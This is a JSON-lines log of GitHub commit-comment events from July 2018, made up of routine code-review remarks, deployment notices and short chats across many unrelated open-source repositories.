{"id":"7956490689","type":"CommitCommentEvent","actor":{"login":"ppekrol"},"repo":{"name":"ravendb/jint"},"payload":{"comment":{"id":29685910,"position":13,"line":68,"path":"Jint/Runtime/JavaScriptException.cs","commit_id":"b9c5028911e853c9eb23140ee65d82fc873c24d8","created_at":"2018-07-12T14:09:09Z","updated_at":"2018-07-12T14:09:09Z","author_association":"MEMBER","body":"@talweiss1982 @maximburyak this is causing 'CanProduceCorrectStackTrace' to fail. Can you check this?"}},"created_at":"2018-07-12T14:09:09Z"}
{"id":"7956490808","type":"CommitCommentEvent","actor":{"login":"wuzabi"},"repo":{"name":"sigdeletras/Spanish_Inspire_Catastral_Downloader"},"payload":{"comment":{"id":29685911,"position":11,"line":306,"path":"Spanish_Inspire_Catastral_Downloader.py","commit_id":"77f581f00f5b6b8aea068ae23317acb2c9627fb8","created_at":"2018-07-12T14:09:10Z","updated_at":"2018-07-12T14:09:10Z","author_association":"NONE","body":"I think EPSG:25831 is correct for the municipalities in catalonia. GMLs have correct EPSG, maybe you check GML EPSG before assigning 25830 to the GeoJSON."}},"created_at":"2018-07-12T14:09:10Z"}
{"id":"7956491751","type":"CommitCommentEvent","actor":{"login":"max-kammerer"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":29685912,"position":5,"line":102,"path":"libraries/stdlib/jvm/runtime/kotlin/jvm/annotations/JvmPlatformAnnotations.kt","commit_id":"335448b4bb105bd093dd89d2cb1af51dde41e462","created_at":"2018-07-12T14:09:19Z","updated_at":"2018-07-12T14:09:19Z","author_association":"CONTRIBUTOR","body":"Seems not"}},"created_at":"2018-07-12T14:09:19Z"}
{"id":"7956493153","type":"CommitCommentEvent","actor":{"login":"Atemo"},"repo":{"name":"rathena/rathena"},"payload":{"comment":{"id":29685916,"position":null,"line":null,"path":null,"commit_id":"f979710985d2e946bb00ce36a2ae8f60d0e7f4be","created_at":"2018-07-12T14:09:32Z","updated_at":"2018-07-12T14:09:32Z","author_association":"MEMBER","body":"I mixed up this commit with the PR  https://github.com/rathena/rathena/commit/6e8599cd5b161168e1ad5b8c23a8db2a7572d841#diff-f7c1c5510980cca14831fc20bd205bc6R50 now merged to master. Please update your master branch.\r\n\r\nDon't forget to `code` the `@` in your comment, thanks !"}},"created_at":"2018-07-12T14:09:32Z"}
{"id":"7956495293","type":"CommitCommentEvent","actor":{"login":"baurmatt"},"repo":{"name":"syseleven/puppet-nginx"},"payload":{"comment":{"id":29685921,"position":10,"line":58,"path":"README.md","commit_id":"76a8e11fab37215cb4c3447c0181ad4f0b4a5a0e","created_at":"2018-07-12T14:09:54Z","updated_at":"2018-07-12T14:09:54Z","author_association":"NONE","body":"Doppelpunkt wird hier nicht funkionieren, da das Puppet Syntax ist. Du musst hier also wohl noch `:` durch `=>` ersetzen."}},"created_at":"2018-07-12T14:09:54Z"}
{"id":"7956496091","type":"CommitCommentEvent","actor":{"login":"qiaosisi"},"repo":{"name":"qiaosisi/ranba_android"},"payload":{"comment":{"id":29685923,"position":null,"line":null,"path":null,"commit_id":"779d747965a2ecacec22d993b8ef7a5ae09d65cc","created_at":"2018-07-12T14:10:02Z","updated_at":"2018-07-12T14:10:02Z","author_association":"OWNER","body":"权限申请，改变水印"}},"created_at":"2018-07-12T14:10:02Z"}
{"id":"7956496474","type":"CommitCommentEvent","actor":{"login":"RyanFlemming"},"repo":{"name":"mosh-hamedani/vidly-mvc-5"},"payload":{"comment":{"id":29685925,"position":null,"line":null,"path":null,"commit_id":"b4e6fe50998cd9d5e183175ac9d1cc904de5c040","created_at":"2018-07-12T14:10:06Z","updated_at":"2018-07-12T14:10:06Z","author_association":"NONE","body":"@bluedaniellotus103 I had a similar issue. Turns out the version this version targets (4.1.1) breaks some functionality. You want [3.3.7](https://bootswatch.com/3/).\r\n\r\nSee [here](https://stackoverflow.com/questions/47984619/bootswatch-theme-not-working-correctly) and [here](https://stackoverflow.com/a/48630895) (Both Stack Overflow links)"}},"created_at":"2018-07-12T14:10:06Z"}
{"id":"7956500514","type":"CommitCommentEvent","actor":{"login":"ludx"},"repo":{"name":"ludx/ludx.github.io"},"payload":{"comment":{"id":29685931,"position":null,"line":null,"path":null,"commit_id":"80692d5a315b20fe1bbee59ad58c7073c067deaa","created_at":"2018-07-12T14:10:43Z","updated_at":"2018-07-12T14:10:43Z","author_association":"OWNER","body":"@yihui 小谢好久不见！2015年我从北京搬家到了成都，还在老东家上班，变成远程工作。小窝在四川大学旁边，现在有个刚一岁半，时刻要撵着跑怕摔倒的小弟弟。假如有机会到成都，一定来坐坐哈。"}},"created_at":"2018-07-12T14:10:43Z"}
{"id":"7956508993","type":"CommitCommentEvent","actor":{"login":"shukari"},"repo":{"name":"michail-nikolaev/task-force-arma-3-radio"},"payload":{"comment":{"id":29685947,"position":null,"line":null,"path":null,"commit_id":"25f3f278c19512bd9a0fc609ec5d91b2dd6dc908","created_at":"2018-07-12T14:12:05Z","updated_at":"2018-07-12T14:12:05Z","author_association":"NONE","body":"Why not with a setting and a childFuntion how many intercom channels there are.\r\nSo any server can set 0 or x custom intercom channels... then there nor hard coded."}},"created_at":"2018-07-12T14:12:05Z"}
{"id":"7956514061","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":29685953,"position":null,"line":null,"path":null,"commit_id":"40d70375a99312e0b6a486804a4aa0a6a823510d","created_at":"2018-07-12T14:12:53Z","updated_at":"2018-07-12T14:12:53Z","author_association":"COLLABORATOR","body":"This issue is becoming a pain in the butt...."}},"created_at":"2018-07-12T14:12:53Z"}
{"id":"7956514259","type":"CommitCommentEvent","actor":{"login":"WilliamHolmes"},"repo":{"name":"WilliamHolmes/watsonwork-xkcd-bot"},"payload":{"comment":{"id":29685954,"position":null,"line":null,"path":null,"commit_id":"1d5141dad98440f64b241516537e8665d4cd618e","created_at":"2018-07-12T14:12:55Z","updated_at":"2018-07-12T14:12:55Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/4657741e-2f67-4a84-85fa-4b0c731e26d1?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-xkcd-bot\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/e457c094-74cf-4ee8-bf2e-53b78dadcc49?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-xkcd-bot\") deployed [watsonwork-xkcd-bot](https://github.com/WilliamHolmes/watsonwork-xkcd-bot/releases/tag/deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180712-141254 \"deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180712-141254\") to [dev](https://console.bluemix.net/apps/0071371e-8c32-4628-9342-c288956009e4?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:holmesw@ie.ibm.com:dev\"), including this commit"}},"created_at":"2018-07-12T14:12:55Z"}
{"id":"7956515688","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":29685958,"position":null,"line":null,"path":null,"commit_id":"ed143608a8220cd196527b2881ba745d00330d87","created_at":"2018-07-12T14:13:09Z","updated_at":"2018-07-12T14:13:09Z","author_association":"COLLABORATOR","body":"This issue is becoming a pain in the butt...."}},"created_at":"2018-07-12T14:13:09Z"}
{"id":"7956519011","type":"CommitCommentEvent","actor":{"login":"tdhooper"},"repo":{"name":"KoltesDigital/shadertoy-exporter"},"payload":{"comment":{"id":29685964,"position":null,"line":null,"path":null,"commit_id":"9d802f9c3235c088d9c1a548c7932c66bda52907","created_at":"2018-07-12T14:13:39Z","updated_at":"2018-07-12T14:13:39Z","author_association":"COLLABORATOR","body":"I had a quick look for workarounds, and there are a few things that could be tried to disable the CORS checks in the electron web view, I'll give them a go later.\r\n\r\nOne problem with building a separate app around the API, is you'll constantly be playing catch up when they add new features.\r\n\r\nThankfully my chrome extension still works."}},"created_at":"2018-07-12T14:13:39Z"}
{"id":"7956527623","type":"CommitCommentEvent","actor":{"login":"melmendo"},"repo":{"name":"nhmishaq/coding_challenges"},"payload":{"comment":{"id":29685979,"position":null,"line":null,"path":null,"commit_id":"8f0a78e9dc3f1fa726b3f3788b339575fdb13a73","created_at":"2018-07-12T14:15:01Z","updated_at":"2018-07-12T14:15:01Z","author_association":"NONE","body":"I think you're on the right track.  I would suggest changing your classes to resemble the .json payload as you mentioned.   Perhaps something like this.\r\n\r\nRemember, each payment can have multiple remittance lines.\r\n\r\n```\r\n    public class PayInfo\r\n    {\r\n        public string PayeeName;\r\n        public string PayeeFax;\r\n        public string PayeePhone;\r\n        public string PaymentPAN;\r\n        public string PaymentCVV;\r\n        public string PaymentExp;\r\n\r\n        // Payee address\r\n        public PaymentAddress Address;\r\n\r\n        // Each payment can have 0 or more remittance lines (ie. invoices)\r\n        public List<Remittance> RemittanceLines;\r\n    }\r\n\r\n    public class PaymentAddress\r\n    {\r\n        public string Address1;\r\n        public string Address2;\r\n        public string City;\r\n        public string StateOrProvince;\r\n        public string Zip;\r\n    }\r\n\r\n    public class Remittance\r\n    {\r\n        public string RemittancePayorName;\r\n        public string RemittancePayorId;\r\n        public string RemittanceInvoiceNo;\r\n        public string RemittanceDescription;\r\n        public string RemittanceAmount;\r\n    }\r\n```"}},"created_at":"2018-07-12T14:15:01Z"}
{"id":"7956530039","type":"CommitCommentEvent","actor":{"login":"PranaliDeore"},"repo":{"name":"PranaliDeore/puppet-tripleo"},"payload":{"comment":{"id":29685991,"position":13,"line":42,"path":"manifests/profile/base/glance/netapp.pp","commit_id":"eea4d18b7655badb41ec2496996bb1326a902f8a","created_at":"2018-07-12T14:15:23Z","updated_at":"2018-07-12T14:15:23Z","author_association":"OWNER","body":"Tested with '/etc/glance/glance-metadata-file.json' .. missed while copying the changes :/"}},"created_at":"2018-07-12T14:15:23Z"}
{"id":"7956533898","type":"CommitCommentEvent","actor":{"login":"n-t-roff"},"repo":{"name":"n-t-roff/heirloom-doctools"},"payload":{"comment":{"id":29685997,"position":null,"line":null,"path":null,"commit_id":"fd2816bbce0e5f8830e5c977cdaf8d322d84db10","created_at":"2018-07-12T14:15:59Z","updated_at":"2018-07-12T14:15:59Z","author_association":"OWNER","body":"@Alhadis using another extension level is not what @reffort wants, since he intents changes to be done which might not be compatible with traditional nroff/troff. So the \"new\" troff needs a separate code base and a separate executable file to be installed. Current `nroff` and `troff` should not be renamed so I suggest a new name for the new troff, e.g. prepend it with one or two letters."}},"created_at":"2018-07-12T14:15:59Z"}
{"id":"7956534189","type":"CommitCommentEvent","actor":{"login":"shukari"},"repo":{"name":"michail-nikolaev/task-force-arma-3-radio"},"payload":{"comment":{"id":29685998,"position":null,"line":null,"path":null,"commit_id":"25f3f278c19512bd9a0fc609ec5d91b2dd6dc908","created_at":"2018-07-12T14:16:02Z","updated_at":"2018-07-12T14:16:02Z","author_association":"NONE","body":"For the setting a number for the count is possible or an array with the custom names... so [\"Alpha\", \"Bravo\", \"Unwanted Guys\"] are then 3 custom channels ;D"}},"created_at":"2018-07-12T14:16:02Z"}
{"id":"7956540643","type":"CommitCommentEvent","actor":{"login":"yihui"},"repo":{"name":"ludx/ludx.github.io"},"payload":{"comment":{"id":29686016,"position":null,"line":null,"path":null,"commit_id":"80692d5a315b20fe1bbee59ad58c7073c067deaa","created_at":"2018-07-12T14:17:04Z","updated_at":"2018-07-12T14:17:04Z","author_association":"NONE","body":"哈哈，好，我也是远程工作。"}},"created_at":"2018-07-12T14:17:04Z"}
{"id":"7956546502","type":"CommitCommentEvent","actor":{"login":"hajik"},"repo":{"name":"hajik/ekul"},"payload":{"comment":{"id":29686028,"position":null,"line":null,"path":null,"commit_id":"db8f6bc1b1f1e6f642b7c6e36aeb9a8c5f5aaab0","created_at":"2018-07-12T14:18:01Z","updated_at":"2018-07-12T14:18:01Z","author_association":"OWNER","body":"test"}},"created_at":"2018-07-12T14:18:01Z"}
{"id":"7956546713","type":"CommitCommentEvent","actor":{"login":"PranaliDeore"},"repo":{"name":"PranaliDeore/puppet-tripleo"},"payload":{"comment":{"id":29686029,"position":23,"line":52,"path":"manifests/profile/base/glance/netapp.pp","commit_id":"eea4d18b7655badb41ec2496996bb1326a902f8a","created_at":"2018-07-12T14:18:03Z","updated_at":"2018-07-12T14:18:03Z","author_association":"OWNER","body":"Glance throws 'Error' here because JSON format requires \"double quotes\" for \"key\" : \"value\".\r\nSo, made change as below. "}},"created_at":"2018-07-12T14:18:03Z"}
{"id":"7956547408","type":"CommitCommentEvent","actor":{"login":"da-snap"},"repo":{"name":"modell-aachen/WorkflowAppPlugin"},"payload":{"comment":{"id":29686031,"position":4,"line":61,"path":"lib/Foswiki/Plugins/WorkflowAppPlugin/Assets/templates/WorkflowAppTemplateSearchGridTemplate.txt","commit_id":"8db806e53d1f803882b8a4c0af2be0a18f5ce5cc","created_at":"2018-07-12T14:18:10Z","updated_at":"2018-07-12T14:18:10Z","author_association":"CONTRIBUTOR","body":"Ich denke ein If ist hier nicht nötig. pageSize sollte immer gesetzt sein.\r\nWenn du ein default wert haben möchstest, kannst du auch schreiben `[% pageSize or '20' %]` oder `[% DEFAULT pageSize = '25' %][% pageSize %]`. "}},"created_at":"2018-07-12T14:18:10Z"}
{"id":"7956548528","type":"CommitCommentEvent","actor":{"login":"mickelson"},"repo":{"name":"mickelson/attract"},"payload":{"comment":{"id":29686033,"position":null,"line":null,"path":null,"commit_id":"2ce5d1e881609945928829d5b5888b764cc4ad08","created_at":"2018-07-12T14:18:19Z","updated_at":"2018-07-12T14:18:19Z","author_association":"OWNER","body":"I’ve done it before where I’ve patched sfml bugs in the windows build environment.  I’ll look at your branch and see about doing the same...\n\n> On Jul 12, 2018, at 6:44 AM, Radek Dutkiewicz <notifications@github.com> wrote:\n> \n> Would you be able to hold up a release based on SFML 2.4.0 by any chance?\n> There is a bug in glyph class that disabled the smoothing of glyphs.\n> The result of that causes loosing sub-pixel positioning of text and glyph clipping appears when scrolling slowly with sub-pixel precision. Also when you zoom the text with shader the text is pixelated.\n> I've fixed it in my commit below, It has been approved, but not merged yet.\n> https://github.com/SFML/SFML/pull/1452/files\n> \n> What do you think we could do in this case? What I did is I made a bash file compiling SFML from my fork before building AM. Could we do that officially? I mean release the windows build based on SFML from my fork.\n> \n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub, or mute the thread.\n"}},"created_at":"2018-07-12T14:18:19Z"}
{"id":"7956548689","type":"CommitCommentEvent","actor":{"login":"mlschroe"},"repo":{"name":"openSUSE/libsolv"},"payload":{"comment":{"id":29686034,"position":13,"line":274,"path":"src/repodata.h","commit_id":"72e8b9af78a98e7226d1d30e3f00848c8b4c36d9","created_at":"2018-07-12T14:18:21Z","updated_at":"2018-07-12T14:18:21Z","author_association":"MEMBER","body":"I just copied it from further above. It's usually done that way to work around include file dependency cycles."}},"created_at":"2018-07-12T14:18:21Z"}
{"id":"7956548765","type":"CommitCommentEvent","actor":{"login":"matthewbauer"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29686035,"position":null,"line":null,"path":null,"commit_id":"f1a14f98446c0d65152542eb1196c4112cce843a","created_at":"2018-07-12T14:18:22Z","updated_at":"2018-07-12T14:18:22Z","author_association":"MEMBER","body":"I'm not very familiar with how ```nix-store --optimise``` works so it might not be necessary. There is still a benefit here I think in getting Nix to build everything locally. You just have to download procps once instead of the individual command for ps, watch, etc.\r\n\r\nMy experience has been that most of the binaries still retain references to their closure even when copying. So you end up getting both copies in your closure:\r\n\r\n```\r\n$ du -sch $(nix-store -qR $(nix-build -A ps channel:nixpkgs-unstable))\r\n124K\t/nix/store/qscgcniqpv7d9zi6frcwbkmrw694lhyp-ps-1003.1-2008\r\n1.7M\t/nix/store/g9ajw7rw27ysf165jkljs3m9ki4y5flp-procps-3.3.15\r\n7.8M\t/nix/store/q8rg4mca5zqv98arpxd7164pqa72hf1n-ncurses-6.1\r\n27M\t/nix/store/83lrbvbmxrgv7iz49mgd42yvhi473xp6-glibc-2.27\r\n36M\ttotal\r\n$ du -sch $(nix-store -qR $(nix-build -A procps channel:nixpkgs-unstable)) | sort -h\r\n1.7M\t/nix/store/g9ajw7rw27ysf165jkljs3m9ki4y5flp-procps-3.3.15\r\n7.8M\t/nix/store/q8rg4mca5zqv98arpxd7164pqa72hf1n-ncurses-6.1\r\n27M\t/nix/store/83lrbvbmxrgv7iz49mgd42yvhi473xp6-glibc-2.27\r\n36M\ttotal\r\n$ nix why-depends -a /nix/store/qscgcniqpv7d9zi6frcwbkmrw694lhyp-ps-1003.1-2008 /nix/store/g9ajw7rw27ysf165jkljs3m9ki4y5flp-procps-3.3.15\r\n/nix/store/qscgcniqpv7d9zi6frcwbkmrw694lhyp-ps-1003.1-2008\r\n╚═══bin/ps: …BC_2.2.5.LIBPROCPS_0./nix/store/g9ajw7rw27ysf165jkljs3m9ki4y5flp-procps-3.3.15/lib:/nix/store/83…\r\n    => /nix/store/g9ajw7rw27ysf165jkljs3m9ki4y5flp-procps-3.3.15\r\n```\r\n\r\nIt must have to do with linking to libprocps? But regardless of all of that you are probably going to have procps downloaded on your system at some point (some things link to ). unix-tools /should/ support multiple outputs if we ever get them in procps or util-linux but I am still thinking that linking would be a better idea."}},"created_at":"2018-07-12T14:18:22Z"}
{"id":"7956550101","type":"CommitCommentEvent","actor":{"login":"hackleberryfinn"},"repo":{"name":"hackleberryfinn/Global-Citizen-Hackleberry-Finn"},"payload":{"comment":{"id":29686039,"position":null,"line":null,"path":null,"commit_id":"44e112ca508b71f32f6717df2eaffaf3e37c767d","created_at":"2018-07-12T14:18:35Z","updated_at":"2018-07-12T14:18:35Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/f3f56358-197d-4212-bb99-0d95d54bfc86?env_id=ibm%3Ayp%3Aus-south \"Global-Citizen-Hackleberry-Finn\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/baf2eb90-00e5-408f-9f5d-d47769aab3be?env_id=ibm%3Ayp%3Aus-south \"Global-Citizen-Hackleberry-Finn\") deployed [Global-Citizen-Hackleberry-Finn](https://github.com/hackleberryfinn/Global-Citizen-Hackleberry-Finn/releases/tag/deploy-ibm-yp-us-south-luke.hutchinson-live.com.au-dev-20180712-141833 \"deploy-ibm-yp-us-south-luke.hutchinson-live.com.au-dev-20180712-141833\") to [dev](https://console.bluemix.net/apps/8b984503-074c-42ab-b13c-92e494596da3?env_id=ibm:yp:us-south \"ibm:yp:us-south:luke.hutchinson@live.com.au:dev\"), including this commit"}},"created_at":"2018-07-12T14:18:35Z"}
{"id":"7956552104","type":"CommitCommentEvent","actor":{"login":"jkosir"},"repo":{"name":"celtra/stateless-components"},"payload":{"comment":{"id":29686045,"position":35,"line":42,"path":"src/stateless/input.vue","commit_id":"b6dc57c7d52f675e0ce985a4c8cf7710014f1631","created_at":"2018-07-12T14:18:52Z","updated_at":"2018-07-12T14:18:52Z","author_association":"CONTRIBUTOR","body":"Why do up and down have stopPropagation? We need this to propagate for typeahead."}},"created_at":"2018-07-12T14:18:52Z"}
{"id":"7956552286","type":"CommitCommentEvent","actor":{"login":"rosscado"},"repo":{"name":"rosscado/raceready"},"payload":{"comment":{"id":29686048,"position":null,"line":null,"path":null,"commit_id":"88d148984e4c9a07e6fa72baa574194d8b23652a","created_at":"2018-07-12T14:18:53Z","updated_at":"2018-07-12T14:18:53Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/0fc11092-0119-4ab8-a5f0-6cbf19d20e03?env_id=ibm%3Ayp%3Aeu-gb \"drivetrain\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/8de9b026-388d-4ebc-984e-5928d63a1d84?env_id=ibm%3Ayp%3Aeu-gb \"drivetrain\") deployed [raceready](https://github.com/rosscado/raceready/releases/tag/deploy-ibm-yp-eu-gb-VeloWare-prod-20180712-141851 \"deploy-ibm-yp-eu-gb-VeloWare-prod-20180712-141851\") to [prod](https://console.bluemix.net/apps/29149676-46ca-4475-a915-34f8757c96dc?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:VeloWare:prod\"), including this commit"}},"created_at":"2018-07-12T14:18:53Z"}
{"id":"7956552929","type":"CommitCommentEvent","actor":{"login":"pkmitre"},"repo":{"name":"nightingaleproject/csharp-fhir-death-record"},"payload":{"comment":{"id":29686051,"position":25,"line":95,"path":"FhirDeathRecord/DeathRecord.cs","commit_id":"4f6b8fc40d39af78dffbd25bb179af2295ddca9d","created_at":"2018-07-12T14:18:59Z","updated_at":"2018-07-12T14:18:59Z","author_association":"CONTRIBUTOR","body":"This seems on the right track, some quick thoughts:\r\n\r\n- Don't think we need an intermediary variable here... unless...\r\n- Will this return a string with the value \"true\"? We may want to cast to a C# native type\r\n- If we don't need an intermediary variable, the single-line format used for e.g. GivenName might make sense"}},"created_at":"2018-07-12T14:18:59Z"}
{"id":"7956559546","type":"CommitCommentEvent","actor":{"login":"jkosir"},"repo":{"name":"celtra/stateless-components"},"payload":{"comment":{"id":29686066,"position":150,"line":310,"path":"src/stateless/input.vue","commit_id":"b6dc57c7d52f675e0ce985a4c8cf7710014f1631","created_at":"2018-07-12T14:20:04Z","updated_at":"2018-07-12T14:20:04Z","author_association":"CONTRIBUTOR","body":"This should be inside if, otherwise you call parseFloat() on a text input field's value"}},"created_at":"2018-07-12T14:20:04Z"}
{"id":"7956560111","type":"CommitCommentEvent","actor":{"login":"locutus2"},"repo":{"name":"MJZ1977/Stockfish"},"payload":{"comment":{"id":29686067,"position":null,"line":null,"path":null,"commit_id":"d9ef9a8a4da25df932f09886fd92e5e636cf12cc","created_at":"2018-07-12T14:20:10Z","updated_at":"2018-07-12T14:20:10Z","author_association":"NONE","body":"In line 476 you can get an undefined behavior because ksq + Up is outside of the board if king is on last rank."}},"created_at":"2018-07-12T14:20:10Z"}
{"id":"7956561993","type":"CommitCommentEvent","actor":{"login":"melmendo"},"repo":{"name":"nhmishaq/coding_challenges"},"payload":{"comment":{"id":29686073,"position":null,"line":null,"path":null,"commit_id":"6d612d7dd9c6730e864762e4938fa920420539b1","created_at":"2018-07-12T14:20:26Z","updated_at":"2018-07-12T14:20:26Z","author_association":"NONE","body":"You'll find it easier if you pass the Model instead of ViewBag (ie. `@model JsonData.PayInfo`)\r\n\r\nThen you're controller action would return this model to your view and you can work with it directly.\r\n```\r\npublic IActionResult Index()\r\n{\r\n    // populate model from .json payload\r\n    var result = GetJson(); // just an example \r\n    ...\r\n    ...\r\n\r\n    return View(result);\r\n}\r\n```\r\n\r\n\r\n"}},"created_at":"2018-07-12T14:20:26Z"}
{"id":"7956562877","type":"CommitCommentEvent","actor":{"login":"oomek"},"repo":{"name":"mickelson/attract"},"payload":{"comment":{"id":29686074,"position":null,"line":null,"path":null,"commit_id":"2ce5d1e881609945928829d5b5888b764cc4ad08","created_at":"2018-07-12T14:20:34Z","updated_at":"2018-07-12T14:20:34Z","author_association":"CONTRIBUTOR","body":"Awesome, thanks!"}},"created_at":"2018-07-12T14:20:34Z"}
{"id":"7956564779","type":"CommitCommentEvent","actor":{"login":"4PERTURE"},"repo":{"name":"codeofhonor-dev/android_kernel_huawei_hi6250"},"payload":{"comment":{"id":29686077,"position":null,"line":null,"path":null,"commit_id":"f4718a22862b9386f7f12c2c95e917779a73e43d","created_at":"2018-07-12T14:20:52Z","updated_at":"2018-07-12T14:20:52Z","author_association":"NONE","body":"Sadly this commit didn't work. When I call someone, touchscreen is still active but black"}},"created_at":"2018-07-12T14:20:52Z"}
{"id":"7956569900","type":"CommitCommentEvent","actor":{"login":"trotyl"},"repo":{"name":"angular/angular"},"payload":{"comment":{"id":29686089,"position":19,"line":19,"path":"CHANGELOG.md","commit_id":"b9e095aa31f0706307fb4633ccd02b645b915d6b","created_at":"2018-07-12T14:21:42Z","updated_at":"2018-07-12T14:21:42Z","author_association":"CONTRIBUTOR","body":"Checked `6.0.8` doesn't contain the change, seems this is just an documentation error, also with `6.0.9` and `6.1.0-rc.0` missing here."}},"created_at":"2018-07-12T14:21:42Z"}
{"id":"7956572416","type":"CommitCommentEvent","actor":{"login":"pieterb"},"repo":{"name":"Amsterdam/dcatd"},"payload":{"comment":{"id":29686094,"position":null,"line":null,"path":null,"commit_id":"f2c01fa9d07c9fe39f9b54f4d638280262ecc049","created_at":"2018-07-12T14:22:07Z","updated_at":"2018-07-12T14:22:07Z","author_association":"CONTRIBUTOR","body":"Ik vind het geweldig"}},"created_at":"2018-07-12T14:22:07Z"}
{"id":"7956574612","type":"CommitCommentEvent","actor":{"login":"zzz6519003"},"repo":{"name":"crista/exercises-in-programming-style"},"payload":{"comment":{"id":29686099,"position":null,"line":null,"path":null,"commit_id":"2f9bc1c53db5ccd6903788b60fbb30023505b4c0","created_at":"2018-07-12T14:22:27Z","updated_at":"2018-07-12T14:22:27Z","author_association":"NONE","body":"teach us some monads XD"}},"created_at":"2018-07-12T14:22:27Z"}
{"id":"7956575210","type":"CommitCommentEvent","actor":{"login":"andrew-secret"},"repo":{"name":"git/git"},"payload":{"comment":{"id":29686100,"position":1,"line":1,"path":"Makefile","commit_id":"e83c5163316f89bfbde7d9ab23ca2e25604af290","created_at":"2018-07-12T14:22:32Z","updated_at":"2018-07-12T14:22:32Z","author_association":"NONE","body":"I saw the future.."}},"created_at":"2018-07-12T14:22:32Z"}
{"id":"7956583515","type":"CommitCommentEvent","actor":{"login":"prasadakula1"},"repo":{"name":"prasadakula1/waffletest"},"payload":{"comment":{"id":29686129,"position":null,"line":null,"path":null,"commit_id":"2dcc5493ff913776c2b0a3606546e332d8d825c7","created_at":"2018-07-12T14:23:51Z","updated_at":"2018-07-12T14:23:51Z","author_association":"OWNER","body":"closes #9 "}},"created_at":"2018-07-12T14:23:51Z"}
{"id":"7956586045","type":"CommitCommentEvent","actor":{"login":"Sami32"},"repo":{"name":"DigitalMediaServer/DigitalMediaServer"},"payload":{"comment":{"id":29686131,"position":1,"line":1,"path":"src/main/external-resources/third-party/Build NSIS Linux and macOS.txt","commit_id":"13681e36d359c2ccca17915d7eb506a6ef5471c5","created_at":"2018-07-12T14:24:15Z","updated_at":"2018-07-12T14:24:15Z","author_association":"CONTRIBUTOR","body":"A link to the official documentation should have the latest informations available if it ever change in 10 years."}},"created_at":"2018-07-12T14:24:15Z"}
{"id":"7956587393","type":"CommitCommentEvent","actor":{"login":"aziz-aljawad"},"repo":{"name":"aziz-aljawad/PetShopApp"},"payload":{"comment":{"id":29686134,"position":4,"line":5,"path":"www/js/services.js","commit_id":"739f9c0f5d40c8e10b3e713f4f796d3a4d95b930","created_at":"2018-07-12T14:24:28Z","updated_at":"2018-07-12T14:24:28Z","author_association":"OWNER","body":"Showing API KEY"}},"created_at":"2018-07-12T14:24:28Z"}
{"id":"7956595940","type":"CommitCommentEvent","actor":{"login":"mora145"},"repo":{"name":"Ludeon/RimWorld-Spanish"},"payload":{"comment":{"id":29686157,"position":null,"line":null,"path":null,"commit_id":"a81ef599dc5cac6a20e85fa8a4d0a4d0a449827c","created_at":"2018-07-12T14:25:49Z","updated_at":"2018-07-12T14:25:49Z","author_association":"CONTRIBUTOR","body":"@colo13verdadeo Ya pasé las ultimas rules. Puedes echarles un vistazo. Aunque te recomiendo primero que te pases por la Wiky de Rimworld y te documentes al respecto de como operan. "}},"created_at":"2018-07-12T14:25:49Z"}
{"id":"7956597612","type":"CommitCommentEvent","actor":{"login":"locutus2"},"repo":{"name":"MJZ1977/Stockfish"},"payload":{"comment":{"id":29686160,"position":null,"line":null,"path":null,"commit_id":"d9ef9a8a4da25df932f09886fd92e5e636cf12cc","created_at":"2018-07-12T14:26:05Z","updated_at":"2018-07-12T14:26:05Z","author_association":"NONE","body":"Also `pos.square<QUEEN>(Us)`  triggers in debug mode an assert if there are not exactly one queen."}},"created_at":"2018-07-12T14:26:05Z"}
{"id":"7956616566","type":"CommitCommentEvent","actor":{"login":"KaelWD"},"repo":{"name":"vuetifyjs/vuetify"},"payload":{"comment":{"id":29686207,"position":74,"line":59,"path":"src/components/VParallax/VParallax.ts","commit_id":"4e63290556afa3fa7c522347811e9ac91f670f68","created_at":"2018-07-12T14:28:59Z","updated_at":"2018-07-12T14:28:59Z","author_association":"MEMBER","body":"`imgData: VNodeData`, then you can remove `alt: null`"}},"created_at":"2018-07-12T14:28:59Z"}
{"id":"7956622466","type":"CommitCommentEvent","actor":{"login":"prasadakula1"},"repo":{"name":"prasadakula1/waffletest"},"payload":{"comment":{"id":29686215,"position":null,"line":null,"path":null,"commit_id":"c5143b4a54b02e618aee521cd6055ac79816adeb","created_at":"2018-07-12T14:29:52Z","updated_at":"2018-07-12T14:29:52Z","author_association":"OWNER","body":"closes #9 "}},"created_at":"2018-07-12T14:29:52Z"}
{"id":"7956629318","type":"CommitCommentEvent","actor":{"login":"americkson"},"repo":{"name":"RAIL-UGA/rail-uga-stellar"},"payload":{"comment":{"id":29686223,"position":null,"line":null,"path":null,"commit_id":"880bfd2c8e0d72875f2c5120c0c9d86d6fc82207","created_at":"2018-07-12T14:30:53Z","updated_at":"2018-07-12T14:30:53Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [rail-uga-stellar#pr-41](https://dashboard.pantheon.io/sites/05f5afa3-c1ec-448f-915a-9234103f2409#pr-41).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-41-rail-uga-stellar.pantheonsite.io/)"}},"created_at":"2018-07-12T14:30:53Z"}
